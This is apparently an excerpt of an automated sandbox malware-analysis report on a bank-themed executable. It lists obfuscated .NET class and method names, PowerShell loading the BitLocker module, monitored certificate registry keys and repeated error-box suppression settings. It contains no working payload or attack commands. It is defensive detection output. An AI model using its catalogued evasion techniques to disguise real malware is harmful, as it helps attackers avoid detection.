Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, cJEy3lj7RDhmtksKR3.cs	High entropy of concatenated method names: 'QepEx3Dgu6', 'QpSEtQ0gQI', 'b1CEKxFeO5', 'Da7EfBVPFp', 'XM3EaAwRTX', 'N4LEyeQS7l', 'sPDsqlYC3Gc0KAKIrc', 'T1Cd9AiNKs1ETNBNJ8', 'FBYEERmniq', 'sJ5EmTFG7i'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, q8qlp0MKt6bc6fpogf.cs	High entropy of concatenated method names: 'oJ3gaFH9BQ', 'iHcguTXgBD', 'an1gg3NXcY', 'N4DghjFwcK', 'c95g9m8LgK', 'CrJgL0mdea', 'Dispose', 'k4GJT2r9PB', 'kZwJBUuIoo', 'gl9JHQXnOv'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, WYNTdRwdLMl5qTPEQ1.cs	High entropy of concatenated method names: 'Cwkq4ceZtE', 'DPkqWj5PNI', 'XWGqi7gMwk', 'PuWqXNSZ2U', 'v6eqOWsr69', 'D15qsjuRDV', 'WBxqPYryjL', 'Q7sq8m31Zx', 'KTCqo6wevs', 'b3lqYR8tPu'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, cTXo4LieQS7llBmlju.cs	High entropy of concatenated method names: 'VuLZe0as2H', 'aFMZBAmpkV', 'fZJZCM15ha', 'GPuZxQ8m7L', 'b7TZtARkyh', 'TIUC3FnvJE', 'SZECIESDoB', 'vyRCMmuHLO', 'NfACrWtj1M', 'jxYCkcFHZg'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	High entropy of concatenated method names: 'tsWmeWVjPV', 'zFtmTRuGhy', 'rSPmBCJJ1f', 'sP8mHtoLBO', 'lltmCg4m1T', 'bPTmZWf7K5', 'xACmx8W1s3', 'DKMmtUFT6r', 'Qibmvm8WUY', 'hVGmKGPa3y'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, C3Dgu64wpSQ0gQIH6K.cs	High entropy of concatenated method names: 'l7dBAVxOJ1', 'YtnBVjgfyg', 'cC3BnGdbj6', 'uE5B6MKhss', 'OhEB3Rw60F', 'dnLBIj5yNe', 'AkWBMsp6I4', 'miVBreSW2x', 'ccjBk390gy', 'VMUB2b6Ink'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, j9cpiJ66Z9wiSMtdK0.cs	High entropy of concatenated method names: 'A1FuKNUuFR', 'xsKufkAB19', 'ToString', 'zMDuTSHwbw', 'FceuBgK86E', 'IE6uHPnKob', 'Xa2uCWPYF8', 'l1QuZH3KgV', 'KXBux9ZGam', 'sGEut2JHFK'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, V4kQeGERxknqoQkEuwR.cs	High entropy of concatenated method names: 'ToString', 'CB4h4fGGPm', 'qSAhWdqH4Y', 'WPihFUV0H7', 'os7hidYyv0', 'oqkhXXTyCy', 'PFjhcJWONj', 'VethOl6tJC', 'EVZ6KclBLPxOLu5JuMi', 'b73wW9lNas1DWFf11RR'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, IXAZZOBxjBEyp8hsZs.cs	High entropy of concatenated method names: 'Dispose', 'TbcEk6fpog', 'GAQRXNUuq2', 'oIub3e1hm3', 'mVtE2oGCW4', 'gr3EzuSN6C', 'ProcessDialogKey', 'YjXRDnVHXZ', 'V05REQPOFV', 'zPcRRevPl8'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, ju7ZP0ID9VJZr4PMmj.cs	High entropy of concatenated method names: 'XD1urXd3jZ', 'dXwu2xPJku', 'bYZJDt7UJm', 'D4oJEV1dbo', 'lLduYZfx6k', 'WKZulQyxMX', 'ddYuw6QS0s', 'bKTuAsMR2B', 'lWEuVmC58m', 'sxUunF3iRp'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, uKJZ9dEErKTqKLwmqyJ.cs	High entropy of concatenated method names: 'JaS02FNQYO', 'muF0zCmmVC', 'cmdhDRrTI9', 'OBGhEaqhtB', 'VyEhR1jKU7', 'O8xhm4SnYd', 'Grshja3XtD', 'Y6xheHGF5b', 'uGyhTsDUX8', 'Jy0hBW7ErO'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, g6ox2O7M9PPBS2a34p.cs	High entropy of concatenated method names: 'PxxxSDJsFy', 'fIfxd4jIrM', 'R8JxUAZ4ZG', 'PGLxb4Ltqp', 'aTNx50BmfF', 'vcCxpDEKJp', 'yWlxQ3MT4V', 'gjfx4FVJYD', 'wIkxWVP3xa', 'CMrxFKckID'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, veqIyGz50RFl7Ca1mV.cs	High entropy of concatenated method names: 'OoS0pBJTLW', 'Duq04iddrX', 'bwa0WgObaA', 'qJJ0iLDYU9', 'ge10XTKxqX', 'bK70OqKHmt', 'Sfk0sU64vq', 'pPq0LdxdvI', 'P000S9CBxW', 'Fus0dE01XP'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, PhEnfrnNqESTaLmMtn.cs	High entropy of concatenated method names: 'ToString', 'LYTyYFKvRO', 'n7tyX4Ci1H', 'XYiyc9vsRe', 'cWVyOMGrv1', 'tLWysAdJlB', 'LXFyN63Xox', 'b6YyPjhVyv', 'YKDy8dVYGO', 'EGky7dM2Yx'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, HnVHXZkI05QPOFVUPc.cs	High entropy of concatenated method names: 'IecgiiUhPi', 'j20gX6m5s4', 'Qk6gcce8G1', 'nwlgO0isJj', 'skbgsCC2qN', 'FtCgNaYqsc', 'UdHgPR7j1u', 'lDHg8qMUnY', 'oE6g7CBe19', 'fOTgoRS3bm'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, gEM2EEW1CxFeO5Qa7B.cs	High entropy of concatenated method names: 'Wv7Hb9S685', 'KHFHp4x9vQ', 'gB3H4UeeXb', 'rC4HWwriyw', 'W8eHa4EX99', 'vxWHyM1WqB', 'BUjHuXelq5', 'mnDHJHJILa', 'n6OHgyeMFC', 'W0KH03Mw98'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, e5PLwVEDrjc1DXkT6Ee.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DCC0Y4BNDL', 'dYJ0lUTmBe', 'E7V0wtt0TY', 'tuu0AK4bPy', 'k5c0VLi0YV', 'XIZ0nrXB7g', 'M9c06APe6G'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, OR4PrZR3vKDptJU2LL.cs	High entropy of concatenated method names: 'ebSUDN5bA', 'FcubvOxv6', 'Inap2B5eP', 'duFQHG9nZ', 'SH2Wi0QDT', 'GJxFr01RI', 'QDKXAWICCVXcTLReNn', 'N5c7W9K9n7UWqgBSod', 'yLwJ1gARZ', 'MGR0ywZIy'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, lZB8mFEjIPgEnB952He.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q2JGgQdFCy', 'ueTG0uGcgr', 'UWxGhxEhiQ', 'sgbGGQdwuY', 'Jn1G9NUUNE', 'aF8G1Ks0Vc', 'PHNGLTiXIF'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, cJEy3lj7RDhmtksKR3.cs	High entropy of concatenated method names: 'QepEx3Dgu6', 'QpSEtQ0gQI', 'b1CEKxFeO5', 'Da7EfBVPFp', 'XM3EaAwRTX', 'N4LEyeQS7l', 'sPDsqlYC3Gc0KAKIrc', 'T1Cd9AiNKs1ETNBNJ8', 'FBYEERmniq', 'sJ5EmTFG7i'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
